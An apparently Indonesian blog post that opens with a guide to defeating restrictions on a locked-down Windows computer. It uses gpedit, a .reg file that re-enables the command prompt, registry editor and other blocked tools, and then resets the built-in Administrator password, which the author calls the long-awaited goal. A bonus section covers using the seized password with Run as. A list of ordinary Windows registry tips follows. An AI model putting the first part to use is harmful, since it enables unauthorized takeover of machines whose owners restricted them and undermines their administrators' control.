C:\Windows\System32\GPEdit.msc <-- double Click ------------------------------------------ start. ------------------------------------------ --------------------------------------- GPEdit.msc --------------------------------------- 1. Jika Klik Kanan di Desktop tidak bisa Masuk Ke GPEdit.msc Masuk ke [User Configuration/Administrative Templates/Desktop] - Disable (Hide and disable all items on the desktop) Jika MyComputer tidak ada - Disable (Remove My Computer icon on the Desktop) 2. Jika Ingin mengubah properties pada taskbar start menu masuk ke [User Configuration/Administrative Templates/Start Menu and Taskbar] - Disable (Prevent changes to Taskbar and Start Menu Settings) Jika Menu Run tidak muncul - Disable (Remove Run menu from Start Menu) Jika menu pada taskbar saat klik kanan tidak muncul - Disable (Remove access to the context menus for the taskbar) 3. Apabila Control Panel tidak bisa di akses Masuk ke [User Configuration/Administrative Templates/Control Panel] - Disable (Prohibit access to the Control Panel) 4. Jika Command Prompt tidak bisa di akses Masuk ke [User Configuration/Administrative Templates/System] - Disable (Prevent access to the command prompt) Jika Registry Editor tidak bisa di akses - Disable (Prevent access to registry editing tools) 5. Jika Task Manager tidak bisa di akses Masuk ke [User Configuration/Administrative Templates/System/Ctrl+Alt+Del Options] - Disable (Remove Task Manager) 6. Jika Folder Options pada Windows Explorer tidak muncul Masuk ke [User Configuration/Administrative Templates/Windows Component/Windows Explorer] - Disable (Remove these Folder Options menu item from the Tools menu) Jika Windows Key tidak berfungsi - Disable (Turn off Windows+X hotkeys) --------------------------------------- GPEdit.msc --------------------------------------- ------------------------------------------- end -------------------------------------------- ==> Setelah GPEdit.msc terbuka baru buka Registry Tools
caranya:
C:\Windows\System32\regedit.exe <-- double Click --- atau --- C:\Windows\regedit.exe <-- double Click ------------------------------------------ start. ------------------------------------------ --------------------------------------- Regedit. --------------------------------------- Regedit4 [HKEY_LOCAL_MACHINE\Software\ResearchMachines\NOATTRIB.VXD] "loadvxd"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDrives"=dword:00000000 "LinkResolveIgnoreLinkInfo"=dword:00000000 "NoFolderOptions"=dword:00000000 "ClearRecentDocsOnExit"=dword:00000000 "NoTrayContextMenu"=dword:00000000 "EnforceShellExtensionSecurity"=dword:00000000 "NoPrinterTabs"=dword:00000000 "NoDeletePrinter"=dword:00000000 "NoAddPrinter"=dword:00000000 "NoRun"=dword:00000000 "NoSetFolders"=dword:00000000 "NoSetTaskbar"=dword:00000000 "NoClose"=dword:00000000 "NoViewContextMenu"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000000 "NoDispScrSavPage"=dword:00000000 "NoDispAppearancePage"=dword:00000000 "NoDispSettingsPage"=dword:00000000 "NoAdminPage"=dword:00000000 "NoProfilePage"=dword:00000000 "NoDevMgrPage"=dword:00000000 "NoConfigPage"=dword:0000000 "NoFileSysPage"=dword:00000000 "NoDispCPL"=dword:00000000 "NoDispBackgroundPage"=dword:00000000 "NoVirtMemPage"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network] "NoFileSharingControl"=dword:00000000 "NoPrintSharingControl"=dword:00000000 "NoNetSetup"=dword:00000000 "NoNetSetupIDPage"=dword:00000000 "NoNetSetupSecurityPage"=dword:00000000 "NoEntireNetwork"=dword:00000000 "NoWorkgroupContents"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp] "NoRealMode"=dword:00000000 "Disable"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop] "NoHTMLWallPaper"=dword:00000000 "NoChangingWallPaper"=dword:00000000 "NoCloseDragDropBands"=dword:00000000 "NoMovingBands"=dword:00000000 "NoAddingComponents"=dword:00000000 "NoDeletingComponents"=dword:00000000 "NoEditingComponents"=dword:00000000 "NoClosingComponents"=dword:00000000 [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoFolderOptions"=dword:00000000 [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableCMD"=dword:00000000 "DisableRegistryTools"=dword:00000000 [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Advanced] "Hidden"=dword:00000000 "HideFileExt"=dword:00000000 "ShowSuperHidden"=dword:00000000 --------------------------------------- Regedit. --------------------------------------- ------------------------------------------- end -------------------------------------------- ==> Setelah regedit.exe terbuka baru ubah password administrator <-- (Ini yang di tunggu2x) caranya: C:\Windows\System32\compmgmt.msc <-- double Click ------------------------------------------ start. ------------------------------------------ ------------------------------------ Administrator. ------------------------------------- Pilih: - Computer Management (Local)/System Tools/Local Users and Groups/User - Klik kanan Administrator -> Set Password

- Ketik New Password: **********
Confirm Password: **********

Selesai deh!!!!!!!!!!!!!

------------------------------------ Administrator. -------------------------------------
------------------------------------------- end --------------------------------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&



---------------------------------------------------------------------------------------------
Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus

--------------------------------------- Bonus - Bonus ---------------------------------------

Jika tidak bisa sama sekali klik kanan di Windows Explorer masih ada trik tertentu
caranya:
- Masuk ke Folder misalnya: C:/Windows/System32
- Trus klik salah satu file dalam folder itu
misalnya: TaskMgr.exe
- Kemudian klik menu File pada Win Explorer
- Run as...
- Klik The following user -> Masukkan passwordnya
Username: Administrator
Password: ********
- Selesai
NB: Cara ini dilakukan jika kita sudah mendapatkan password administrator seperti yang telah
kita pelajari di atas. jika semua cara di atas masih ngga bisa jg berarti masih ada cara
lain silakan anda temukan sendiri, selamat mencoba

Contoh lain2nya dibawah ini...........


1. Membuka MSConfig dari Windows Explorer
Caranya:
C:\WINDOWS\pchealth\helpctr\binaries\MSConfig.exe

2. Membuka Sysedit dari Windows Explorer
Caranya:
C:\Windows\System32\Sysedit.exe

3. Membuka Task Manager
Caranya:
C:\Windows\System32\taskmgr.exe

4. Membuka Services.msc
Caranya:
C:\Windows\System32\services.msc

5. Membuka Disk Management System (Melihat Partisi Harddisk)
Caranya:
C:\Windows\System32\diskmgmt.msc

6. Membuka Computer Management Services
Caranya:
C:\Windows\System32\compmgmt.msc

7. Membuka Shortcut to desktop
Caranya:
C:\Windows\System32\Show Desktop

8. Membuka Defragment
Caranya
C:\Windows\System32\dfrg.msc

Read More...

Kumpulan Tips & Trik Windows

Dikirim oleh - Andy - IT Share - On 08.56 0 Komentar

Mencegah penggantian setting Display Properties

Anda dapat melakukan Setting display dari Control Panel - Display atau melalui klik kanan pada desktop, lalu pilih Properties.
Dengan setting di bawah ini orang lain tidak dapat mengganti setting pada Display tersebut.



Ikutilah langkah berikut:
Klik Start——–>Run, ketikkan regedit lalu tekan Enter.
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\System
Value Name: NoDispCPL
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/mencegah penggantian)

Shortcut untuk Shutdown
Untuk mempercepat shutdown Anda bisa membuat shortcut pada desktop. Caranya :
1. Klik kanan area kosong pada desktop lalu pilih New - Shortcut.
2. Pada command line ketikkan c:\windows\rundll32.exe user, exitwindows.
3. Klik next dan beri nama shortcut tersebut.
4. Terakhir klik Finish.

Shortcut untuk Log Off
Untuk mempercepat log off Anda bisa membuat shortcut pada desktop. Caranya :
1. Klik kanan area kosong pada desktop lalu pilih New - Shortcut.
2. Pada command line ketikkan C:\WINDOWS\RUNDLL.EXE shell32.dll,SHExitWindowsEx 0
3. Klik next dan beri nama shortcut tersebut.
4. Terakhir klik Finish

Mencegah perintah Shut Down
Setting berikut akan mencegah seseorang untuk mematikan komputer Anda. Hal ini berguna jika misalnya Anda meninggalkan komputer untuk beberapa saat dan Anda khawatir ada orang lain yang akan men-Shut Down komputer Anda.
Ikutilah langkah berikut.
Klik Start*Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\Explorer
Value Name: NoClose
Data Type : REG_DWORD
Data: (0 = shutdown enabled, 1 = shutdown disabled)

Reboot tanpa Loading
Bila Anda melakukan boot ulang Windows, sistem operasi ini akan me-restart PC dan kemudian masuk kembali ke Desktop Windows. Bagi Anda yang sering bolak-balik meng-install aplikasi, lama-kelamaan kewajibawan’ boot ulang Windows ini menjadi kurang praktis. Pada dasarnya aplikasi yang meminta restart Windows hanya memerlukan update registry Windows saja. Untuk itu ada cara yang lebih cepat yang dapat Anda lakukan. Caranya dengan menekan tombol [Shift] ketika melakukan restart karena Windows hanya akan melakukan start ulang, tanpa me-load BIOS

Menyimpan Isi Folder
Anda yang sering mengamati isi dari suatu folder, tentunya butuh cara yang tepat dan cepat. Untuk itu ikuti langkah berikut :
Pertama buat file isifolder.bat dengan Notepad dan diletakkan di c:\windows, lalu ketikkan :
@echo off
dir %1% /o > c:\windows\isifolder.txt notepad c:\windows\isifolder.txt
Buka registry lalu ke key [HKEY_CLASSES_ROOT\Directory\Shell
Buat key baru dg mengklik kanan pilih New - Key.
Pindah ke panel sebelah kanan, klik 2x pada Default.
Isi dengan &Lihat Isi Folder Buat key lagi dengan nama command.
Pd panel sebelah kanan klik 2x pd Default. Isi dengan c:\windows\isifolder.bat %1
Mulai sekarang untuk melihat dan menyimpan isi dari suatu folder, Anda tinggal mengklik kanan pada folder tersebut.

Mencegah Perubahan Setting Printer
Jika Anda meng-enable setting ini, maka orang lain tidak dapat mengganti setting pada Control Panel - Printer.
Ikutilah langkah berikut.
Klik Start—–>Run, ketikkan regedit lalu tekan Enter.
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\Explorer
Value Name: NoPrinters
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)

Mencegah Perubahan Setting Password
Jika Anda meng-enable setting ini, maka orang lain tidak dapat mengganti setting pada Control Panel - Password. Dengan kata lain orang lain tidak dapat mengganti password (jika komputer Anda memakai password Windows).
Ikutilah langkah berikut.
Klik Start——>Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\System
Value Name: NoSecCPL
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)

Mengcopy dari DOS Prompt
Suatu saat kamu mungkin ingin melakukan copy tampilan text yang ada pada Dos Prompt. Untuk itu ikuti tips berikut :
Klik icon Mark yang terletak pada toolbar Dos Prompt.
Pilih area yang ingin Anda copy dengan melakukan drag.
Tekan icon Copy.
Setelah itu Anda dapat melakukan Paste, misalnya pada Notepad, MS Word, dll.

Mencetak Daftar File pada Folder
Sistem operasi Windows tidak menyediakan fasilitas untuk mencetak daftar file pada suatu directory. Tapi dengan sedikit tips berikut Anda bisa melakukannya. Caranya dari menu Start, —> Run. Ketikkan command /c dir>prn lalu klik OK atau cukup tekan Enter.

Mengetahui IRQ yang Telah Digunakan
1. Klik kanan pada icon My Computer.
2. Pilih Properties.
3. Pindah ke tab Device Manager.
4. Pilih Computer dan klik Properties.
Selanjutnya akan muncul tampilan yang menginformasikan IRQ mana saja yang telah digunakan dan “siapa” yang menggunakan IRQ tersebut.
Membuka link pada window baru
Khusus Internet Explorer, untuk membuka link pada window atau jendela baru, caranya tekan shift lalu klik link tersebut. Selain itu juga bisa dengan mengklik kanan pada link dan pilih Open in New Window

Mengubah Icon Drive dengan AutoRun
Pernah lihat icon Drive CDROM yang berubah ketika kita memasukan sebuah CD? nah.. hal yang sama bisa juga kita praktekkan pada Drive Harddisk. Bukalah Notepad anda dan ketik :
[autorun]
icon=nama icon.ico
Save dengan nama autorun.inf dan letakan di root drive yang dituju ( ct : C:\ atau D:\ )
Selanjutnya, letakan file icon yang kita inginkan di tempat yang sama dengan file autorun.inf, lalu restart komputer anda.
Tips : agar tampilan file di drive tidak berantakan, ubah atribut kedua file tersebut menjadi hidden.

Kerusakan pada File win.com
Saat booting windows Anda menampilkan pesan:
The following file is missing or corrupted: Win.com
The following file is missing or corrupted: Win.com
Program too big to fit in memory Cannot find Win.com, unable to continue loading Windows
Program too large
Untuk mengatasinya, Anda harus membuat file win.com baru dengan cara mengekstrak file win.cnf dari CD Windows. Langkah komplitnya sebagai berikut :
Ekstrak file win.cnf dari CD Windows ke folder C:\Windows.
Setelah diekstrak kemudian gantilah nama win.cnf menjadi win.com. Caranya : ren c:\windows\win.cnf c:\windows\win.com

Shortcut ke Pengaturan System
Biasanya anda harus mengklik kanan desktop lalus Properties. Sebenarnya ada cara yang lebih cepat yaitu dengan menggunakan shortcut. Caranya :
1. Klik kanan pada desktop, pilih New - Shortcut.
2. Pada command line, ketikkan C:\WINDOWS\CONTROL.EXE Sysdm.cpl, System,1
3. Klik next dan beri nama shortcut tersebut.
4. Terakhir klik Finish.

Disable Klik Kanan pada Dekstop & Windows Explorer
Jika Anda meng-enable setting di bawah ini maka tidak ada yang bisa melakukan klik kanan pada Desktop & Windows Explorer. Dengan kata lain menu yang muncul waktu klik kanan tidak ada lagi.
Ikutilah langkah berikut.
Klik Start—->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\Explorer
Value Name: NoViewContextMenu
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)

Disable Klik Kanan pada Taskbar
Jika Anda meng-enable setting di bawah ini maka tidak akan muncul menu waktu melakukan klik kanan pada Start Menu, Tab control, dan Clock.Ikutilah langkah berikut.
Klik Start*Run, ketikkan regedit lalu tekan Enter.
Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\Explorer]
Value Name: NoTrayContextMenu
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)

Perataan Teks pada Drop Down Menu
Drop down menu = menu yg muncul saat Anda mengklik menu File, Edit, Help, dll pd berbagai aplikasi Windows
Secara default, alignment pada drop down menu adalah rata kiri. Kalau Anda suka, Anda bisa menggantinya menjadi rata kanan. Ikutilah langkah berikut.
Klik Start—->Run, ketikkan regedit lalu tekan Enter.
Caranya :
Key: HKEY_CURRENT_USER\Control Panel\Desktop
Value Name: MenuDropAlignment
Data Type: REG_SZ
Data: (0 = rata kiri, 1 = rata kanan)


Read More...